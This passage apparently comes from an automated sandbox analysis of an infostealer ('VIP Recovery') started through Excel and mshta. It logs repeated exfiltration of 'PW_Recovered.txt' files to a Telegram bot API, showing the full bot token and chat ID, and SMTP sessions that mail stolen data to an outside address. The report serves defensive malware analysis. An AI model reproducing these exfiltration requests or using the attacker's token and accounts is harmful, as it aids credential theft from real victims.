                                    2024-08-13 18:26:00 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 64 64 63 37 65 34 62 64 35 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 41 6c 62 75 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 38 38 36 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 38 2f 31 33 2f 32 30 32 34 20 2f 20 32 3a 32 34 3a 34 34 20 50 4d
                                    Data Ascii: --------------------------8dcbddc7e4bd5e0Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:888683Date and Time: 8/13/2024 / 2:24:44 PM
                                    2024-08-13 18:26:00 UTC388INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Tue, 13 Aug 2024 18:26:00 GMT
                                    Content-Type: application/json
                                    Content-Length: 558
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    2024-08-13 18:26:00 UTC558INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74
                                    Data Ascii: {"ok":true,"result":{"message_id":1371,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"privat


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    30192.168.2.2249219149.154.167.2204433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:26:01 UTC343OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=------------------------8dcbe40cf9a0238
                                    Host: api.telegram.org
                                    Content-Length: 560
                                    2024-08-13 18:26:01 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 65 34 30 63 66 39 61 30 32 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 41 6c 62 75 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 38 38 36 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 38 2f 31 33 2f 32 30 32 34 20 2f 20 32 3a 32 34 3a 35 36 20 50 4d
                                    Data Ascii: --------------------------8dcbe40cf9a0238Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:888683Date and Time: 8/13/2024 / 2:24:56 PM
                                    2024-08-13 18:26:02 UTC388INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Tue, 13 Aug 2024 18:26:02 GMT
                                    Content-Type: application/json
                                    Content-Length: 559
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    2024-08-13 18:26:02 UTC559INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74
                                    Data Ascii: {"ok":true,"result":{"message_id":1372,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"privat


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    31192.168.2.2249221149.154.167.2204433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:26:03 UTC367OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=------------------------8dcbe5b5aaec62e
                                    Host: api.telegram.org
                                    Content-Length: 560
                                    Connection: Keep-Alive
                                    2024-08-13 18:26:03 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 65 35 62 35 61 61 65 63 36 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 41 6c 62 75 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 38 38 36 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 38 2f 31 33 2f 32 30 32 34 20 2f 20 32 3a 32 34 3a 35 36 20 50 4d
                                    Data Ascii: --------------------------8dcbe5b5aaec62eContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:888683Date and Time: 8/13/2024 / 2:24:56 PM
                                    2024-08-13 18:26:04 UTC388INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Tue, 13 Aug 2024 18:26:04 GMT
                                    Content-Type: application/json
                                    Content-Length: 558
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    2024-08-13 18:26:04 UTC558INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74
                                    Data Ascii: {"ok":true,"result":{"message_id":1373,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"privat


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    32192.168.2.2249223149.154.167.2204433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:26:07 UTC367OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=------------------------8dcbe7ce2b69c01
                                    Host: api.telegram.org
                                    Content-Length: 560
                                    Connection: Keep-Alive
                                    2024-08-13 18:26:07 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 65 37 63 65 32 62 36 39 63 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 41 6c 62 75 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 38 38 36 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 38 2f 31 33 2f 32 30 32 34 20 2f 20 32 3a 32 34 3a 35 36 20 50 4d
                                    Data Ascii: --------------------------8dcbe7ce2b69c01Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:888683Date and Time: 8/13/2024 / 2:24:56 PM
                                    2024-08-13 18:26:07 UTC388INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Tue, 13 Aug 2024 18:26:07 GMT
                                    Content-Type: application/json
                                    Content-Length: 558
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    2024-08-13 18:26:07 UTC558INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74
                                    Data Ascii: {"ok":true,"result":{"message_id":1374,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"privat


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    33192.168.2.2249224149.154.167.2204433560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:26:11 UTC367OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                    Content-Type: multipart/form-data; boundary=------------------------8dcbe9bda6024fb
                                    Host: api.telegram.org
                                    Content-Length: 560
                                    Connection: Keep-Alive
                                    2024-08-13 18:26:11 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 65 39 62 64 61 36 30 32 34 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 41 6c 62 75 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 38 38 38 36 38 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 38 2f 31 33 2f 32 30 32 34 20 2f 20 32 3a 32 34 3a 35 36 20 50 4d
                                    Data Ascii: --------------------------8dcbe9bda6024fbContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:888683Date and Time: 8/13/2024 / 2:24:56 PM
                                    2024-08-13 18:26:11 UTC388INHTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Tue, 13 Aug 2024 18:26:11 GMT
                                    Content-Type: application/json
                                    Content-Length: 558
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    2024-08-13 18:26:11 UTC558INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74
                                    Data Ascii: {"ok":true,"result":{"message_id":1375,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"privat


                                    TimestampSource PortDest PortSource IPDest IPCommands
                                    Aug 13, 2024 20:25:53.012552023 CEST58749207208.91.199.224192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                    Aug 13, 2024 20:25:53.012814045 CEST49207587192.168.2.22208.91.199.224EHLO 888683
                                    Aug 13, 2024 20:25:53.171355963 CEST58749207208.91.199.224192.168.2.22250-us2.outbound.mailhostbox.com
                                    250-PIPELINING
                                    250-SIZE 41648128
                                    250-VRFY
                                    250-ETRN
                                    250-STARTTLS
                                    250-AUTH PLAIN LOGIN
                                    250-AUTH=PLAIN LOGIN
                                    250-ENHANCEDSTATUSCODES
                                    250-8BITMIME
                                    250-DSN
                                    250 CHUNKING
                                    Aug 13, 2024 20:25:53.172539949 CEST49207587192.168.2.22208.91.199.224AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                    Aug 13, 2024 20:25:53.333530903 CEST58749207208.91.199.224192.168.2.22334 UGFzc3dvcmQ6
                                    Aug 13, 2024 20:25:53.498531103 CEST58749207208.91.199.224192.168.2.22235 2.7.0 Authentication successful
                                    Aug 13, 2024 20:25:53.499133110 CEST49207587192.168.2.22208.91.199.224MAIL FROM:<jyotis@sixilncoln.com>
                                    Aug 13, 2024 20:25:53.660145998 CEST58749207208.91.199.224192.168.2.22250 2.1.0 Ok
                                    Aug 13, 2024 20:25:53.660589933 CEST49207587192.168.2.22208.91.199.224RCPT TO:<favourcloning@gmail.com>
                                    Aug 13, 2024 20:25:53.861452103 CEST58749207208.91.199.224192.168.2.22250 2.1.5 Ok
                                    Aug 13, 2024 20:25:53.861922979 CEST49207587192.168.2.22208.91.199.224DATA
                                    Aug 13, 2024 20:25:54.023612022 CEST58749207208.91.199.224192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                    Aug 13, 2024 20:25:54.024630070 CEST49207587192.168.2.22208.91.199.224.
                                    Aug 13, 2024 20:25:54.429477930 CEST58749207208.91.199.224192.168.2.22250 2.0.0 Ok: queued as BBFC1A804E1
                                    Aug 13, 2024 20:25:56.553353071 CEST58749213208.91.199.223192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                    Aug 13, 2024 20:25:56.553514004 CEST49213587192.168.2.22208.91.199.223EHLO 888683
                                    Aug 13, 2024 20:25:56.708194017 CEST58749213208.91.199.223192.168.2.22250-us2.outbound.mailhostbox.com
                                    250-PIPELINING
                                    250-SIZE 41648128
                                    250-VRFY
                                    250-ETRN
                                    250-STARTTLS
                                    250-AUTH PLAIN LOGIN
                                    250-AUTH=PLAIN LOGIN
                                    250-ENHANCEDSTATUSCODES
                                    250-8BITMIME
                                    250-DSN
                                    250 CHUNKING
                                    Aug 13, 2024 20:25:56.708585978 CEST49213587192.168.2.22208.91.199.223AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                    Aug 13, 2024 20:25:56.865731955 CEST58749213208.91.199.223192.168.2.22334 UGFzc3dvcmQ6
                                    Aug 13, 2024 20:25:57.025535107 CEST58749213208.91.199.223192.168.2.22235 2.7.0 Authentication successful
                                    Aug 13, 2024 20:25:57.025816917 CEST49213587192.168.2.22208.91.199.223MAIL FROM:<jyotis@sixilncoln.com>
                                    Aug 13, 2024 20:25:57.182723999 CEST58749213208.91.199.223192.168.2.22250 2.1.0 Ok
                                    Aug 13, 2024 20:25:57.182936907 CEST49213587192.168.2.22208.91.199.223RCPT TO:<favourcloning@gmail.com>
                                    Aug 13, 2024 20:25:57.380317926 CEST58749213208.91.199.223192.168.2.22250 2.1.5 Ok
                                    Aug 13, 2024 20:25:57.380548000 CEST49213587192.168.2.22208.91.199.223DATA
                                    Aug 13, 2024 20:25:57.538000107 CEST58749213208.91.199.223192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                    Aug 13, 2024 20:25:57.538513899 CEST49213587192.168.2.22208.91.199.223.
                                    Aug 13, 2024 20:25:57.973299980 CEST58749213208.91.199.223192.168.2.22250 2.0.0 Ok: queued as 48672500771
                                    Aug 13, 2024 20:25:58.038789988 CEST58749213208.91.199.223192.168.2.22250 2.0.0 Ok: queued as 48672500771
                                    Aug 13, 2024 20:25:59.141726017 CEST58749217208.91.199.224192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                    Aug 13, 2024 20:25:59.141980886 CEST49217587192.168.2.22208.91.199.224EHLO 888683
                                    Aug 13, 2024 20:25:59.301354885 CEST58749217208.91.199.224192.168.2.22250-us2.outbound.mailhostbox.com
                                    250-PIPELINING
                                    250-SIZE 41648128
                                    250-VRFY
                                    250-ETRN
                                    250-STARTTLS
                                    250-AUTH PLAIN LOGIN
                                    250-AUTH=PLAIN LOGIN
                                    250-ENHANCEDSTATUSCODES
                                    250-8BITMIME
                                    250-DSN
                                    250 CHUNKING
                                    Aug 13, 2024 20:25:59.301676989 CEST49217587192.168.2.22208.91.199.224AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                    Aug 13, 2024 20:25:59.465667009 CEST58749217208.91.199.224192.168.2.22334 UGFzc3dvcmQ6
                                    Aug 13, 2024 20:25:59.731761932 CEST58749217208.91.199.224192.168.2.22235 2.7.0 Authentication successful
                                    Aug 13, 2024 20:25:59.732095957 CEST49217587192.168.2.22208.91.199.224MAIL FROM:<jyotis@sixilncoln.com>
                                    Aug 13, 2024 20:26:00.143615961 CEST58749217208.91.199.224192.168.2.22250 2.1.0 Ok
                                    Aug 13, 2024 20:26:00.143876076 CEST49217587192.168.2.22208.91.199.224RCPT TO:<favourcloning@gmail.com>
                                    Aug 13, 2024 20:26:00.549397945 CEST58749217208.91.199.224192.168.2.22250 2.1.5 Ok
                                    Aug 13, 2024 20:26:00.549776077 CEST49217587192.168.2.22208.91.199.224DATA
                                    Aug 13, 2024 20:26:00.718460083 CEST58749217208.91.199.224192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                    Aug 13, 2024 20:26:00.719355106 CEST49217587192.168.2.22208.91.199.224.
                                    Aug 13, 2024 20:26:01.123513937 CEST58749217208.91.199.224192.168.2.22250 2.0.0 Ok: queued as 448A3A805AC
                                    Aug 13, 2024 20:26:05.187594891 CEST58749222208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                    Aug 13, 2024 20:26:05.188874960 CEST49222587192.168.2.22208.91.198.143EHLO 888683
                                    Aug 13, 2024 20:26:05.345963001 CEST58749222208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                    250-PIPELINING
                                    250-SIZE 41648128
                                    250-VRFY
                                    250-ETRN
                                    250-STARTTLS
                                    250-AUTH PLAIN LOGIN
                                    250-AUTH=PLAIN LOGIN
                                    250-ENHANCEDSTATUSCODES
                                    250-8BITMIME
                                    250-DSN
                                    250 CHUNKING
                                    Aug 13, 2024 20:26:05.349524021 CEST49222587192.168.2.22208.91.198.143AUTH login anlvdGlzQHNpeGlsbmNvbG4uY29t
                                    Aug 13, 2024 20:26:05.507941961 CEST58749222208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                    Aug 13, 2024 20:26:05.671179056 CEST58749222208.91.198.143192.168.2.22235 2.7.0 Authentication successful
                                    Aug 13, 2024 20:26:05.671333075 CEST49222587192.168.2.22208.91.198.143MAIL FROM:<jyotis@sixilncoln.com>
                                    Aug 13, 2024 20:26:05.831532001 CEST58749222208.91.198.143192.168.2.22250 2.1.0 Ok
                                    Aug 13, 2024 20:26:05.831769943 CEST49222587192.168.2.22208.91.198.143RCPT TO:<favourcloning@gmail.com>
                                    Aug 13, 2024 20:26:06.013304949 CEST58749222208.91.198.143192.168.2.22250 2.1.5 Ok
                                    Aug 13, 2024 20:26:06.013585091 CEST49222587192.168.2.22208.91.198.143DATA
                                    Aug 13, 2024 20:26:06.170491934 CEST58749222208.91.198.143192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                    Aug 13, 2024 20:26:06.170988083 CEST49222587192.168.2.22208.91.198.143.
                                    Aug 13, 2024 20:26:06.463207006 CEST58749222208.91.198.143192.168.2.22250 2.0.0 Ok: queued as E5629B80212

                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:14:24:00
                                    Start date:13/08/2024
                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                    Imagebase:0x13f5e0000
                                    File size:28'253'536 bytes
                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:4
                                    Start time:14:24:24
                                    Start date:13/08/2024
                                    Path:C:\Windows\System32\mshta.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                    Imagebase:0x13f170000
                                    File size:13'824 bytes
                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:14:24:28
                                    Start date:13/08/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
